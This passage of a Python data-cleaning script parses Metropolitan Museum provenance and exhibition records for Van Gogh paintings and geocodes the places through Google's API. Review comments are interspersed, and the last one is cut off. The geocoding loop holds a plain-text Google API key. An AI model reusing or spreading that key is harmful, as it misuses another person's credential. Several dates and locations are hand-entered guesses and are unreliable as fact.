provItemMainSplit[2].strip()\n provYear = int(1910) #this is a guess splitting up the this owner and the next equally\n elif (p==4):\n provOwner = provItemMainSplit[0].strip() + ', ' + provItemMainSplit[1].strip().replace(')','')\n provLocation = provItemMainSplit[2].strip()\n provYear = int(1935) #this is a guess based on when her husband died\n\n\n else :\n provOwner = provItemMainSplit[0].strip()\n provLocation = provItemMainSplit[1].strip()\n provYear = provItemMainSplit[2].strip()\n\n provLocation = provLocation.split(' and')[0]\n provLocation = provLocation.split('/')[0]\n\n provYear = re.sub('\\D','', provYear) # remove everything that is not a number\n provYear = provYear[:4]\n\n ## more than three is a little weirder\n elif len(provItemMainSplit) > 3 :\n\n provItemMain = provItem.split(';')[0]\n ## Fringe Cases where the below doesn't work ##\n if ((objectNumber == 436528 and p == 1) or (objectNumber == 436534 and p == 1)) :\n provOwner = \"the estate of the artist's mother, Anna van gogh-Carbentus\"\n provLocation = 'Leiden'\n provYear = '1908'\n elif (objectNumber == 459123 and p == 1):\n provOwner = provItemMainSplit[1].strip()\n provLocation = provItemMainSplit[2].strip().split(')')[0]\n provYear = int(provItemMainSplit[len(provItemMainSplit)-1].strip())\n\n else :\n ## let's guess that the last bit of string is the year ###\n ## that didn't work for 459123 - https://metmuseum.org/art/collection/search/459123\n if objectNumber==459123:\n if p==0:\n provYear = 1888\n else:\n provYear = provItemMainSplit[len(provItemMainSplit)-1].strip()\n provYear = re.sub('\\D','', provYear) # remove everything that is not a number\n provYear = provYear[:4]\n else:\n provYear = provItemMainSplit[len(provItemMainSplit)-1].strip()\n provYear = re.sub('\\D','', provYear) # remove everything that is not a number\n provYear = provYear[:4]\n\n ### let's guess that the first bit of the string is the owner ###\n provOwner = provItemMainSplit[0].strip()\n\n ### now let's go through the remaining bits, see which one has cities text, and pull that text (along with country if possible)\n for a in range(1,len(provItemMainSplit)-1):\n provItemMainSplit[a] = provItemMainSplit[a].replace('Asnières','Paris') #suburb of Paris not being picked up\n provItemMainSplit[a] = provItemMainSplit[a].replace('Marie Julien','Arles') #this is for the first row of 459123 - data quality issue?\n\n ## go through each row and if we pull a valid city (NOT anna from Van Gogh's mom), then atttribute that city as location\n if ((len(GeoText(provItemMainSplit[a]).cities) > 0) and 
(provItemMainSplit[a].strip() != 'Anna van Gogh-Carbentus')):\n try:\n if len(GeoText(provItemMainSplit[a+1]).countries) > 0:\n provLocation = provItemMainSplit[a].strip() + ' ' + provItemMainSplit[a+1].strip()\n else:\n provLocation = provItemMainSplit[a].strip()\n except ValueError:\n provLocation = provItemMainSplit[a].strip()\n break\n else :\n provOwner += ', ' + provItemMainSplit[a].strip()\n\n ## less than three might not have all the info we need, so we'll look at context from other rows to see what's missing\n ### there are 13 instances of these across the 18 pieces for Van Gogh\n # y: ||||||||\n # o:\n # l: |||| (436535,436535)\n\n # so, none are missing the owner, most are missing year, and around half as many are missing location\n else :\n ## if we're missing year, then we will pull the last date from the previous year\n ### that means the next person will take ownership of the painting when the previous owner gave it up\n if re.sub('\\D','', provItemMainSplit[1]) == '':\n if (objectNumber in ([436525,436526,436531])):\n provYear = re.sub('\\D','', splitProvList[p-1])[-4:]\n provOwner = provItemMainSplit[0].strip()\n provLocation = provItemMainSplit[1].split('and')[0].strip()\n else:\n pass\n\n ## we know the year, but don't have the location in this data point\n else :\n provOwner = provItemMainSplit[0].strip()\n provYear = re.sub('\\D','', provItemMainSplit[1])[:4]\n if (provOwner == 'Wildenstein') : # https://metmuseum.org/art/collection/search/436536\n provLocation = 'London'\n elif (provOwner == 'A. Stoll') : # it's a guess = https://metmuseum.org/art/collection/search/436536\n provLocation = 'London'\n elif (objectNumber==436533 and p==0) :\n provLocation = 'Arles' # https://metmuseum.org/art/collection/search/436533\n elif (objectNumber==436535 and p==2) :\n provLocation = 'Paris' # kind of a guess based on rows before and after\n elif (objectNumber==437998 and p==9) :\n provLocation = 'Switzerland'\n else:\n pass\n\n provenanceList.append({\n 'pid': pid\n ,'object_number':int(objectNumber)\n ,'year': provYear\n ,'location': provLocation\n ,'owner': provOwner\n })\n\n ## add item if we know when it was transferred to MMA\n if (p==len(splitProvList)-1):\n if objectNumber not in ([459123]):\n mmaOwner = 'Metropolitan Museum of Art'\n mmaLocation = 'Metropolitan Museum of Art'\n mmaProvItem = provItem.replace('; on loan to MMA, 1936','on loan to MMA')\n if re.sub('\\D','', mmaProvItem.split(';')[-1]) == '':\n mmaYearDec = re.sub('\\D','', mmaProvItem.split(';')[-2])[-2:]\n else :\n mmaYearDec = re.sub('\\D','', mmaProvItem.split(';')[-1])[-2:]\n if int(mmaYearDec) < 20:\n mmaYearCen = 20\n else :\n mmaYearCen = 19\n mmaYear = int(str(mmaYearCen) + str(mmaYearDec))\n provenanceList.append({\n 'pid':str(objectNumber)+'_999'\n ,'object_number':int(objectNumber)\n ,'year':mmaYear\n ,'location':mmaLocation\n ,'owner':mmaOwner\n })\n\n\n\n ### EXHIBITION HISTORY ###\n if vanGoghProvenance['exhibitionHistory'][index] is not None:\n vanGoghProvenance['exhibitionHistory'][index] = vanGoghProvenance['exhibitionHistory'][index].replace('

THIS WORK MAY NOT BE LENT, BY TERMS OF ITS ACQUISITION BY THE METROPOLITAN MUSEUM OF ART.

','')\n vanGoghProvenance['exhibitionHistory'][index] = vanGoghProvenance['exhibitionHistory'][index].replace('St.','St')\n objectNumber = vanGoghProvenance['object_number'][index]\n exhibitionHistory = vanGoghProvenance['exhibitionHistory'][index]\n exhibitionHistory = vanGoghProvenance['exhibitionHistory'][index].split('

')\n if '' in exhibitionHistory: exhibitionHistory.remove('') # remove blank rows that come at the end\n\n def pullYear(n):\n exhibitionYear = int(exhibitionHistory[eh].split(',')[-n][-4:])\n # see if this event spans multiple years\n if ('-' in exhibitionHistory[eh]) :\n # if (objectNumber == 436525 and exhibitionYear == 1991) :\n # print(n)\n # print(exhibitionHistory[eh].split(\".\")[0])\n # print(exhibitionHistory[eh])\n if len(exhibitionHistory[eh].split(',')) >= (n+1) :\n if (len(exhibitionHistory[eh].split(',')[-(n+1)].split('-')) > 1) :\n try:\n exhibitionYear2 = int(exhibitionHistory[eh].split(',')[-(n+1)].split('-')[-2])\n if exhibitionYear2 == exhibitionYear-1:\n exhibitionHistoryList.append({\n 'ehid': ehid,\n 'object_number':int(objectNumber),\n 'year': exhibitionYear2,\n 'location': exhibitionLocation,\n 'exhibition': exhibitionHistory[eh]\n })\n exhibitionHistoryList.append({\n 'ehid': ehid,\n 'object_number':int(objectNumber),\n 'year': exhibitionYear,\n 'location': exhibitionLocation,\n 'exhibition': exhibitionHistory[eh]\n })\n else:\n exhibitionHistoryList.append({\n 'ehid': ehid,\n 'object_number':int(objectNumber),\n 'year': exhibitionYear,\n 'location': exhibitionLocation,\n 'exhibition': exhibitionHistory[eh]\n })\n except ValueError:\n exhibitionHistoryList.append({\n 'ehid': ehid,\n 'object_number':int(objectNumber),\n 'year': exhibitionYear,\n 'location': exhibitionLocation,\n 'exhibition': exhibitionHistory[eh]\n })\n else :\n exhibitionHistoryList.append({\n 'ehid': ehid,\n 'object_number': int(objectNumber),\n 'year': exhibitionYear,\n 'location': exhibitionLocation,\n 'exhibition': exhibitionHistory[eh]\n })\n else:\n exhibitionHistoryList.append({\n 'ehid': ehid,\n 'object_number': int(objectNumber),\n 'year': exhibitionYear,\n 'location': exhibitionLocation,\n 'exhibition': exhibitionHistory[eh]\n })\n\n # for each record in the exhibition history I need year, city, and name of exhibition/museum\n for eh in range(len(exhibitionHistory)):\n ehid = str(objectNumber) + '_' + str(eh)\n exhibitionHistory[eh] = exhibitionHistory[eh].replace('–','-')\n if exhibitionHistory[eh].split(\".\")[0] == \"New York\" and exhibitionHistory[eh].split(\".\")[1].strip() == \"The Metropolitan Museum of Art\":\n exhibitionLocation = \"Metropolitan Museum of Art\"\n else:\n exhibitionLocation = exhibitionHistory[eh].split(\".\")[0]\n if len(exhibitionHistory[eh].split(',')) >= 2:\n try:\n pullYear(2)\n except ValueError:\n try:\n pullYear(3)\n except ValueError:\n try:\n pullYear(4)\n except ValueError:\n pullYear(5)\n else:\n # one fringe case, which is 436525, reading Denver Art Museum. 
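pullYear walks the comma-separated fields from the right and trusts the trailing four characters to be a year, with extra branches for spans like "1901-2". A regex sketch of the same extraction (extract_years is a hypothetical name, and this simple pattern only recovers fully written four-digit years, not the short second half of a span):

import re

def extract_years(record):
    # Find every standalone 4-digit year between 1800 and 2099.
    return [int(y) for y in re.findall(r'\b(1[89]\d{2}|20\d{2})\b', record)]

# extract_years('Paris. Galerie Bernheim-Jeune, "Van Gogh," March 1901') -> [1901]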
1938 [see Los Angeles 1941].\n exhibitionYear = int(exhibitionHistory[eh].split(' [')[0][-4:])\n exhibitionHistoryList.append({\n 'ehid': ehid,\n 'object_number': int(objectNumber),\n 'year': exhibitionYear,\n 'location': exhibitionLocation,\n 'exhibition': exhibitionHistory[eh]\n })\n\nexhibitionHistoryList = pd.DataFrame(exhibitionHistoryList)\n\nprovenanceList = pd.DataFrame(provenanceList)\nprovenanceList['year'] = provenanceList['year'].astype(int)\nfor index in vanGoghProvenance.index.values:\n objectNumber = vanGoghProvenance['object_number'][index]\n objectYear = vanGoghProvenance['object_year'][index]\n if len(provenanceList.loc[(provenanceList['object_number']==objectNumber) & (provenanceList['year']==objectYear),:]) == 0:\n firstDataPoint = pd.DataFrame({\n 'pid' : str(objectNumber)+'_-1'\n ,'object_number' : int(objectNumber)\n ,'year' : int(objectYear)\n ,'location' : 'Paris'\n ,'owner' : 'the artist'\n # ,columns = [['pid'],['object_number'],['year'],['location'],['owner']]\n }, index=[0])\n provenanceList = provenanceList.append(firstDataPoint,ignore_index=True)\n\nprovenanceList = provenanceList.sort_values(by=['object_number','year'])\n\n\n## Little bit of manual location clean-up\nexhibitionHistoryList.loc[exhibitionHistoryList['location']=='Washington','location'] = 'Washington D.C.'\nexhibitionHistoryList.loc[exhibitionHistoryList['location']=='Zurich','location'] = 'Zürich'\nexhibitionHistoryList.loc[exhibitionHistoryList['location']=='Oxford Arts Club','location'] = 'Oxford'\nprovenanceList.loc[provenanceList['location']=='Zurich','location'] = 'Zürich'\n\n\n### Pull Lat Lng coordinates for all locations from Google Geocoding API once, which I will then join back into Prov and ExhibHistory data\n\nlocationsList = list(provenanceList['location'].unique()) + list(exhibitionHistoryList['location'].unique())\nlocationsList = list(set(locationsList))\n# print(locationsList)\nlocationsGeo = []\nfor l in range(len(locationsList)):\n time.sleep(0.5) # Do two requests per second to avoid issues with Google API Usage Limits - https://developers.google.com/maps/documentation/geocoding/usage-limits\n print(locationsList[l])\n\n city = ''\n state = ''\n sublocality = ''\n country = ''\n\n # # seach google geocoding api to pull LatLng for that location\n coordinates = []\n displayCoordinates = []\n googleAPIKey = 'AIzaSyClejN5Zy--nDKo4SbWM2S2eWyufkMnyEs'\n googleGeocodeBaseURL = 'https://maps.googleapis.com/maps/api/geocode/json?address='\n exhibitionLocationURL = locationsList[l]\n responseURL = googleGeocodeBaseURL+exhibitionLocationURL+'&key='+googleAPIKey\n response = requests.get(responseURL)\n resp_json_payload = response.json()\n if (resp_json_payload['status'] != \"ZERO_RESULTS\"):\n for l in range(len(resp_json_payload['results'][0]['address_components'])):\n if 'locality' in resp_json_payload['results'][0]['address_components'][l]['types']:\n city = resp_json_payload['results'][0]['address_components'][l]['long_name'].replace('Taitō','Tokyo')\n elif 'administrative_area_level_1' in resp_json_payload['results'][0]['address_components'][l]['types']:\n state = ', ' + resp_json_payload['results'][0]['address_components'][l]['short_name']\n elif 'country' in resp_json_payload['results'][0]['address_components'][l]['types']:\n country = resp_json_payload['results'][0]['address_components'][l]['long_name']\n elif 'sublocality' in resp_json_payload['results'][0]['address_components'][l]['types']:\n sublocality = 
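Two things are worth flagging in the geocoding loop above: the inner loop over address_components reuses the variable l that also indexes locationsList, so locationsList[l] in the final append no longer points at the location that was queried, and the API key is hardcoded in the source. A minimal sketch of the same Geocoding call with the key read from the environment (GOOGLE_API_KEY is an assumed variable name, not from the original):

import os
import requests

def geocode(address):
    # One Geocoding API round trip; returns (lat, lng) or None.
    resp = requests.get(
        'https://maps.googleapis.com/maps/api/geocode/json',
        params={'address': address, 'key': os.environ['GOOGLE_API_KEY']},
    ).json()
    if resp['status'] != 'OK':
        return None
    loc = resp['results'][0]['geometry']['location']
    return loc['lat'], loc['lng']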
resp_json_payload['results'][0]['address_components'][l]['long_name']\n\n lat = resp_json_payload['results'][0]['geometry']['location']['lat']\n lng = resp_json_payload['results'][0]['geometry']['location']['lng']\n coordinates.append(lat)\n coordinates.append(lng)\n\n if city == '':\n if sublocality == '':\n displayLocation = country\n else:\n if country == 'United States':\n displayLocation = sublocality+state\n else:\n displayLocation = sublocality\n elif country == 'United States':\n displayLocation = city+state\n else:\n displayLocation = city\n\n print(displayLocation)\n\n displayLocationURL = displayLocation + ', ' + country\n displayLocationResponseURL = googleGeocodeBaseURL+displayLocationURL+'&key='+googleAPIKey\n displayResponse = requests.get(displayLocationResponseURL)\n display_resp_json_payload = displayResponse.json()\n if (resp_json_payload['status'] != \"ZERO_RESULTS\"):\n displayLat = display_resp_json_payload['results'][0]['geometry']['location']['lat']\n displayLng = display_resp_json_payload['results'][0]['geometry']['location']['lng']\n displayCoordinates.append(displayLat)\n displayCoordinates.append(displayLng)\n\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n #\n # # add exhibition to exhibitionHistoryList\n #\n locationsGeo.append({\n 'location': locationsList[l],\n 'coordinates': coordinates,\n 'displayLocation': displayLocation,\n 'country': country,\n 'displayCoordinates': displayCoordinates\n })\n\nlocationsGeoDF = pd.DataFrame(locationsGeo)\nlocationsGeoJSON = os.path.join(dir,'locationsGeo.json')\nlocationsGeoDF.to_json(locationsGeoJSON)\n\n'''\n### Join pulled lat lng coordinates into Prov and ExhibHistory\nlocationsGeoJSON = os.path.join(dir,'assets','locationsGeo.json')\nlocationsGeo = pd.read_json(locationsGeoJSON)\nexhibitionHistoryList = pd.merge(exhibitionHistoryList,locationsGeo,on='location',how='left')\nprovenanceList = pd.merge(provenanceList,locationsGeo,on='location',how='left')\nexhibitionHistoryList.columns = ['pid','owner','location','object_number','year','coordinates']\nprovenanceList['data_type'] = 'provenance'\nexhibitionHistoryList['data_type'] = 'exhibition'\n\ncurrentYear = now.year\n\n# print(provenanceList.columns.values)\n# print(exhibitionHistoryList.columns.values)\n# print(exhibitionHistoryList.head(15))\n\nprovAndExhib = pd.concat([provenanceList,exhibitionHistoryList])\nprovAndExhib = provAndExhib.sort_values(by=['object_number','year'],ascending=['True','True']).reset_index()\nprovAndExhibShort = provAndExhib[['location','object_number']]\nprovAndExhibShort = provAndExhibShort.drop_duplicates()\nprint(provAndExhibShort['location'].value_counts())\n''''''\nfor index in vanGoghProvenance.index.values:\n eventSpecificRows = []\n imageName = vanGoghProvenance['image'][index]\n # print(imageName)\n objectNumber = vanGoghProvenance['object_number'][index]\n ownerList = provenanceList.loc[provenanceList['object_number']==objectNumber,'owner'].unique()\n # if objectNumber == 436525:\n for o in range(len(ownerList)):\n owner = ownerList[o]\n ownerRow = provenanceList.loc[(provenanceList['owner']==owner) & (provenanceList['object_number']==objectNumber),:]\n ownerRowIndex = ownerRow.index.values[0]\n if owner == ownerList[0]:\n prevOwner = 'FIRST'\n else:\n prevOwner = ownerList[o-1]\n if owner == ownerList[len(ownerList)-1]:\n nextOwner = 'LAST'\n else:\n nextOwner = ownerList[o+1]\n\n def addOwnerRows(objectNumber,owner,prevOwner,nextOwner):\n ownerRow = provenanceList.loc[(provenanceList['owner']==owner) & 
(provenanceList['object_number']==objectNumber),:]\n ownerRowIndex = ownerRow.index.values[0]\n\n # prevOwnerRow = provenanceList.loc[(provenanceList['owner']==prevOwner) & (provenanceList['object_number']==objectNumber),:]\n # prevOwnerRowIndex = prevOwnerRow.index.values[0]\n\n # nextOwnerRow = provenanceList.loc[(provenanceList['owner']==nextOwner) & (provenanceList['object_number']==objectNumber),:]\n # nextOwnerRowIndex = nextOwnerRow.index.values[0]\n\n startYear = provenanceList['year'][ownerRowIndex]\n if nextOwner == 'LAST':\n endYear = currentYear\n nextOwnerRowIndex = ownerRowIndex\n else:\n nextOwnerRow = provenanceList.loc[(provenanceList['owner']==nextOwner) & (provenanceList['object_number']==objectNumber),:]\n nextOwnerRowIndex = nextOwnerRow.index.values[0]\n endYear = provenanceList['year'][nextOwnerRowIndex]\n\n ownerExhibitions = exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==objectNumber) & (exhibitionHistoryList['year'] >= startYear) & (exhibitionHistoryList['year'] < endYear),:]\n\n ## Add first line that moves \"to and from\" starting location ##\n if prevOwner == 'FIRST':\n year = int(provenanceList['year'][ownerRowIndex])\n\n coordinates = []\n coordinates.append(provenanceList['coordinates'][ownerRowIndex])\n coordinates.append(provenanceList['coordinates'][ownerRowIndex])\n\n cities = []\n cities.append(provenanceList['location'][ownerRowIndex])\n cities.append(provenanceList['location'][ownerRowIndex])\n\n owners = []\n owners.append(provenanceList['owner'][ownerRowIndex])\n owners.append(provenanceList['owner'][ownerRowIndex])\n\n changeFlag = 1\n\n dataType = 'provenance'\n\n eventSpecificRows.append({\n 'line': {\n 'year': year\n ,'coordinates': coordinates\n ,'cities': cities\n ,'owner': owners\n ,'changeFlag': changeFlag\n ,'dataType': dataType\n }\n })\n\n if len(ownerExhibitions)>0:\n ownerExhibitionIndeces = ownerExhibitions.index.values\n # print(len(ownerExhibitionIndeces))\n year = int(exhibitionHistoryList['year'][ownerExhibitionIndeces[0]])\n\n coordinates = []\n coordinates.append(provenanceList['coordinates'][ownerRowIndex])\n coordinates.append(exhibitionHistoryList['coordinates'][ownerExhibitionIndeces[0]])\n\n cities = []\n cities.append(provenanceList['location'][ownerRowIndex])\n cities.append(exhibitionHistoryList['location'][ownerExhibitionIndeces[0]])\n\n owners = []\n owners.append(provenanceList['owner'][ownerRowIndex])\n owners.append(\"Exhibition - \"+re.sub(\" ([\\(\\[]).*?([\\)\\]])\", \"\", exhibitionHistoryList['owner'][ownerExhibitionIndeces[0]].split('.')[1].replace('\"','')).split(\",\")[0])\n # owners.append(exhibitionHistoryList['owner'][ownerExhibitionIndeces[0]])\n # owners.append(\"On Exhibition\")\n\n changeFlag = 1\n\n dataType = 'exhibition'\n\n eventSpecificRows.append({\n 'line': {\n 'year': year\n ,'coordinates': coordinates\n ,'cities': cities\n ,'owner': owners\n ,'changeFlag': changeFlag\n ,'dataType': dataType\n }\n })\n\n for oe in range(1,len(ownerExhibitionIndeces)):\n year = int(exhibitionHistoryList['year'][ownerExhibitionIndeces[oe]])\n\n coordinates = []\n coordinates.append(exhibitionHistoryList['coordinates'][ownerExhibitionIndeces[oe-1]])\n coordinates.append(exhibitionHistoryList['coordinates'][ownerExhibitionIndeces[oe]])\n\n cities = []\n cities.append(exhibitionHistoryList['location'][ownerExhibitionIndeces[oe-1]])\n cities.append(exhibitionHistoryList['location'][ownerExhibitionIndeces[oe]])\n\n owners = []\n # 
owners.append(exhibitionHistoryList['owner'][ownerExhibitionIndeces[oe-1]])\n owners.append(\"On Exhibition\")\n # print(exhibitionHistoryList['owner'][ownerExhibitionIndeces[0]].split('.')[1].replace('\"',''))\n # owners.append(exhibitionHistoryList['owner'][ownerExhibitionIndeces[oe]])\n owners.append(\"On Exhibition\")\n\n changeFlag = 1\n\n dataType = 'exhibition'\n\n eventSpecificRows.append({\n 'line': {\n 'year': year\n ,'coordinates': coordinates\n ,'cities': cities\n ,'owner': owners\n ,'changeFlag': changeFlag\n ,'dataType': dataType\n }\n })\n\n year = int(provenanceList['year'][nextOwnerRowIndex])\n\n coordinates = []\n coordinates.append(exhibitionHistoryList['coordinates'][ownerExhibitionIndeces[len(ownerExhibitionIndeces)-1]])\n coordinates.append(provenanceList['coordinates'][nextOwnerRowIndex])\n\n cities = []\n cities.append(exhibitionHistoryList['location'][ownerExhibitionIndeces[len(ownerExhibitionIndeces)-1]])\n cities.append(provenanceList['location'][nextOwnerRowIndex])\n\n owners = []\n # owners.append(exhibitionHistoryList['owner'][ownerExhibitionIndeces[len(ownerExhibitionIndeces)-1]])\n # owners.append(\"On Exhibition\")\n owners.append(\"Exhibition - \"+re.sub(\" ([\\(\\[]).*?([\\)\\]])\", \"\", exhibitionHistoryList['owner'][ownerExhibitionIndeces[len(ownerExhibitionIndeces)-1]].split('.')[1].replace('\"','')).split(\",\")[0])\n # print(re.sub(\" ([\\(\\[]).*?([\\)\\]])\", \"\", exhibitionHistoryList['owner'][ownerExhibitionIndeces[0]].split('.')[1].replace('\"','')).split(\",\")[0])\n owners.append(provenanceList['owner'][nextOwnerRowIndex])\n\n changeFlag = 1\n\n dataType = 'exhibition'\n\n eventSpecificRows.append({\n 'line': {\n 'year': year\n ,'coordinates': coordinates\n ,'cities': cities\n ,'owner': owners\n ,'changeFlag': changeFlag\n ,'dataType': dataType\n }\n })\n\n else:\n # pass\n year = int(provenanceList['year'][nextOwnerRowIndex])\n\n coordinates = []\n coordinates.append(provenanceList['coordinates'][ownerRowIndex])\n coordinates.append(provenanceList['coordinates'][nextOwnerRowIndex])\n\n cities = []\n cities.append(provenanceList['location'][ownerRowIndex])\n cities.append(provenanceList['location'][nextOwnerRowIndex])\n\n owners = []\n owners.append(provenanceList['owner'][ownerRowIndex])\n owners.append(provenanceList['owner'][nextOwnerRowIndex])\n\n changeFlag = 1\n\n dataType = 'provenance'\n\n eventSpecificRows.append({\n 'line': {\n 'year': year\n ,'coordinates': coordinates\n ,'cities': cities\n ,'owner': owners\n ,'changeFlag': changeFlag\n ,'dataType': dataType\n }\n })\n\n\n\n else:\n prevOwnerRow = provenanceList.loc[(provenanceList['owner']==prevOwner) & (provenanceList['object_number']==objectNumber),:]\n prevOwnerRowIndex = prevOwnerRow.index.values[0]\n\n # year = int(provenanceList['year'][ownerRowIndex])\n #\n # coordinates = []\n # coordinates.append(provenanceList['coordinates'][prevOwnerRowIndex])\n # coordinates.append(provenanceList['coordinates'][ownerRowIndex])\n #\n # cities = []\n # cities.append(provenanceList['location'][prevOwnerRowIndex])\n # cities.append(provenanceList['location'][ownerRowIndex])\n #\n # owners = []\n # owners.append(provenanceList['owner'][prevOwnerRowIndex])\n # owners.append(provenanceList['owner'][ownerRowIndex])\n #\n # changeFlag = 1\n #\n # dataType = 'provenance'\n #\n # eventSpecificRows.append({\n # 'line': {\n # 'year': year\n # ,'coordinates': coordinates\n # ,'cities': cities\n # ,'owner': owners\n # ,'changeFlag': changeFlag\n # ,'dataType': dataType\n # }\n # })\n\n\n ### Were 
there any exhibitions that happened while that person was the owner? ###\n if len(ownerExhibitions)>0:\n ownerExhibitionIndeces = ownerExhibitions.index.values\n # print(len(ownerExhibitionIndeces))\n year = int(ownerExhibitions['year'][ownerExhibitionIndeces[0]])\n\n coordinates = []\n coordinates.append(provenanceList['coordinates'][ownerRowIndex])\n coordinates.append(ownerExhibitions['coordinates'][ownerExhibitionIndeces[0]])\n\n cities = []\n cities.append(provenanceList['location'][ownerRowIndex])\n cities.append(ownerExhibitions['location'][ownerExhibitionIndeces[0]])\n\n owners = []\n owners.append(provenanceList['owner'][ownerRowIndex])\n # owners.append(ownerExhibitions['owner'][ownerExhibitionIndeces[0]])\n # owners.append(\"On Exhibition\")\n owners.append(\"Exhibition - \"+re.sub(\" ([\\(\\[]).*?([\\)\\]])\", \"\", exhibitionHistoryList['owner'][ownerExhibitionIndeces[0]].split('.')[1].replace('\"','')).split(\",\")[0])\n # print(exhibitionHistoryList['owner'][ownerExhibitionIndeces[0]].split('.')[0].replace('\"',''))\n\n changeFlag = 1\n\n dataType = 'exhibition'\n\n eventSpecificRows.append({\n 'line': {\n 'year': year\n ,'coordinates': coordinates\n ,'cities': cities\n ,'owner': owners\n ,'changeFlag': changeFlag\n ,'dataType': dataType\n }\n })\n\n for oe in range(1,len(ownerExhibitionIndeces)):\n year = int(ownerExhibitions['year'][ownerExhibitionIndeces[oe]])\n\n coordinates = []\n coordinates.append(ownerExhibitions['coordinates'][ownerExhibitionIndeces[oe-1]])\n coordinates.append(ownerExhibitions['coordinates'][ownerExhibitionIndeces[oe]])\n\n cities = []\n cities.append(ownerExhibitions['location'][ownerExhibitionIndeces[oe-1]])\n cities.append(ownerExhibitions['location'][ownerExhibitionIndeces[oe]])\n\n owners = []\n # owners.append(ownerExhibitions['owner'][ownerExhibitionIndeces[oe-1]])\n owners.append(\"Exhibition - \"+re.sub(\" ([\\(\\[]).*?([\\)\\]])\", \"\", exhibitionHistoryList['owner'][ownerExhibitionIndeces[oe-1]].replace(\"Mrs.\",\"Mrs\").replace(\"G.\",\"G\").replace(\"R.\",\"R\").replace(\"M.\",\"M\").replace(\"E.\",\"E\").split('.')[1].replace('\"','')).split(\",\")[0])\n owners.append(\"Exhibition - \"+re.sub(\" ([\\(\\[]).*?([\\)\\]])\", \"\", exhibitionHistoryList['owner'][ownerExhibitionIndeces[oe]].replace(\"Mrs.\",\"Mrs\").replace(\"G.\",\"G\").replace(\"R.\",\"R\").replace(\"M.\",\"M\").replace(\"E.\",\"E\").split('.')[1].replace('\"','')).split(\",\")[0])\n # owners.append(\"On Exhibition\")\n # owners.append(\"On Exhibition\")\n # print(exhibitionHistoryList['owner'][ownerExhibitionIndeces[0]].split('.')[1].replace('\"',''))\n\n changeFlag = 1\n\n dataType = 'exhibition'\n\n eventSpecificRows.append({\n 'line': {\n 'year': year\n ,'coordinates': coordinates\n ,'cities': cities\n ,'owner': owners\n ,'changeFlag': changeFlag\n ,'dataType': dataType\n }\n })\n\n if nextOwner == 'LAST':\n year = int(ownerExhibitions['year'][ownerExhibitionIndeces[len(ownerExhibitionIndeces)-1]])\n else:\n year = int(provenanceList['year'][nextOwnerRowIndex])\n\n coordinates = []\n coordinates.append(ownerExhibitions['coordinates'][ownerExhibitionIndeces[len(ownerExhibitionIndeces)-1]])\n coordinates.append(provenanceList['coordinates'][nextOwnerRowIndex])\n\n cities = []\n cities.append(ownerExhibitions['location'][ownerExhibitionIndeces[len(ownerExhibitionIndeces)-1]])\n cities.append(provenanceList['location'][nextOwnerRowIndex])\n\n owners = []\n # owners.append(ownerExhibitions['owner'][ownerExhibitionIndeces[len(ownerExhibitionIndeces)-1]])\n # 
owners.append(\"On Exhibition\")\n owners.append(\"Exhibition - \"+re.sub(\" ([\\(\\[]).*?([\\)\\]])\", \"\", exhibitionHistoryList['owner'][ownerExhibitionIndeces[len(ownerExhibitionIndeces)-1]].replace(\"Mrs.\",\"Mrs\").replace(\"G.\",\"G\").replace(\"R.\",\"R\").replace(\"M.\",\"M\").replace(\"E.\",\"E\").replace(\"J.\",\"J\").replace(\"Alex.\",\"Alex\").split('.')[1].replace('\"','')).split(\",\")[0])\n owners.append(provenanceList['owner'][nextOwnerRowIndex])\n\n changeFlag = 1\n\n dataType = 'provenance'\n\n eventSpecificRows.append({\n 'line': {\n 'year': year\n ,'coordinates': coordinates\n ,'cities': cities\n ,'owner': owners\n ,'changeFlag': changeFlag\n ,'dataType': dataType\n }\n })\n\n else:\n # pass\n year = int(provenanceList['year'][nextOwnerRowIndex])\n\n coordinates = []\n coordinates.append(provenanceList['coordinates'][ownerRowIndex])\n coordinates.append(provenanceList['coordinates'][nextOwnerRowIndex])\n\n cities = []\n cities.append(provenanceList['location'][ownerRowIndex])\n cities.append(provenanceList['location'][nextOwnerRowIndex])\n\n owners = []\n owners.append(provenanceList['owner'][ownerRowIndex])\n owners.append(provenanceList['owner'][nextOwnerRowIndex])\n\n changeFlag = 1\n\n dataType = 'provenance'\n\n eventSpecificRows.append({\n 'line': {\n 'year': year\n ,'coordinates': coordinates\n ,'cities': cities\n ,'owner': owners\n ,'changeFlag': changeFlag\n ,'dataType': dataType\n }\n })\n\n # print(str(startYear) + '-' + str(endYear))\n\n addOwnerRows(objectNumber,owner,prevOwner,nextOwner)\n\n\n # print(eventSpecificRows)\n '''\n'''\n jsonLINE = []\n\n def addProvenance(column,listName):\n for x in provenanceList.loc[(provenanceList['object_number']==vanGoghProvenance['object_number'][index]) & (provenanceList['year']==y),column].index.values:\n listName.append(provenanceList.loc[(provenanceList['object_number']==vanGoghProvenance['object_number'][index]) & (provenanceList['year']==y),column][x])\n\n def addPrevProvenance(column,listName):\n provIndex = provenanceList.loc[(provenanceList['object_number']==vanGoghProvenance['object_number'][index]) & (provenanceList['year']==y),column].index.values\n provIndex = provIndex[0]\n if provIndex == 0:\n newIndex = 0\n else:\n newIndex = provIndex-1\n if provenanceList['object_number'][newIndex] == provenanceList['object_number'][provIndex]:\n listName.append(provenanceList[column][newIndex])\n\n def addCurrentProvenance(column,listName):\n prevIndex = provenanceList.loc[(provenanceList['object_number']==vanGoghProvenance['object_number'][index]) & (provenanceList['year']= 1):\n ## If there were exhibitions in that year ###\n if (len(exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y)]) > 0):\n ehidList = exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y),'ehid'].unique()\n ### If an exhibition spanned into the next year ##\n if len(exhibitionHistoryList.loc[(exhibitionHistoryList['ehid'].isin(ehidList)) & (exhibitionHistoryList['year']==y+1)]) > 0:\n ## no examples of this, but adding just in case for the future ##\n ### Add all ownership changing hands, then all exhibitions ###\n coordinates = []\n addPrevProvenance('coordinates',coordinates)\n addProvenance('coordinates',coordinates)\n addExhibition('coordinates',coordinates)\n\n cities = []\n addPrevProvenance('location',cities)\n addProvenance('location',cities)\n 
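addOwnerRows appends the same five-key 'line' record in every branch, with only the values changing; a small constructor would collapse each of those blocks to one call. A sketch under the assumption that the record shape stays exactly as above (make_line is a hypothetical name):

def make_line(year, coordinates, cities, owners, data_type):
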